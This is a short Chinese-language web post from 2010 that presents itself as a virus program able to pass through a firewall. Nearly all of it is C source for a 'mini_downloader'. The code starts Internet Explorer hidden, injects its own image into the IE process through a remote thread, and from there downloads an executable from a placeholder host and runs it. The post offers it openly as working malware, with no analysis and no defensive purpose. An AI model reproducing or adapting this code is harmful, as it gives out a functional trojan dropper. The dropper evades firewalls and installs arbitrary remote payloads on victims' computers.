一段可以穿过防火墙的病毒程序

发布:admin | 发布时间: 2010年2月7日

3k穿墙下载者VC源代码:

/*
   "mini_downloader"
   code bykardinal p.s.t
   compile by vc++ 6.0
   can not run under win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
//#pragma comment(linker, "/OPT:NOWIN98")   //取消这几行的注释，编译出的文件只有2K大小
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:main")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")

   HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数
   DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数
   HANDLE processhandle;
   DWORD pid;
   HINSTANCE hshell,hurlmon;
void download() //注入使用的下载函数
{
   hshell=LoadLibrary("Shell32.dll");
   hurlmon=LoadLibrary("urlmon.dll");
   (FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
   (FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
   DOWNFILE(NULL,"http://www.xxxxxxx.cn/en/notepad.exe","c:\\ieinst12.exe",0, NULL);
   SHELLRUN(0,"open","c:\\ieinst12.exe",NULL,NULL,5);
   ExitProcess(0);
};

void main() //主函数
{
    //1.得到IE路径,并运行
   char iename[MAX_PATH],iepath[MAX_PATH];
   ZeroMemory(iename,sizeof(iename));
   ZeroMemory(iepath,sizeof(iepath));
   GetWindowsDirectory(iepath,MAX_PATH);
   strncpy(iename,iepath,3);
   strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE");
   //strcat(iename,"windows\\notepad.EXE");
   WinExec(iename,SW_HIDE);
   Sleep(500);
   //2.得到 IE process handle
   HWND htemp;
   htemp=FindWindow("IEFrame",NULL);
   GetWindowThreadProcessId(htemp,&pid);
   processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);

   //3.分配内存
   HMODULE Module;
   LPVOID NewModule;
   DWORD Size;
   LPDWORD lpimagesize;
   Module = GetModuleHandle(NULL);//进程映像的基址
   //得到内存镜像大小
   _asm
   {
       push eax;
       push ebx;
       mov ebx,Module;
       mov eax,[ebx+0x3c];
       lea eax,[ebx+eax+0x50];
       mov eax,[eax]
       mov lpimagesize,eax;
       pop ebx;
       pop eax;
   };
   Size=(DWORD)lpimagesize;
   NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置
   //4.写内存，创建线程
   WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据
   LPTHREAD_START_ROUTINE entrypoint;
   __asm
   {
       push eax;
       lea eax,download;
       mov entrypoint,eax;
       pop eax
   }
CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL);    //建立远程线程,并运行

   //5.关闭对象
   CloseHandle(processhandle);
   return;
} ;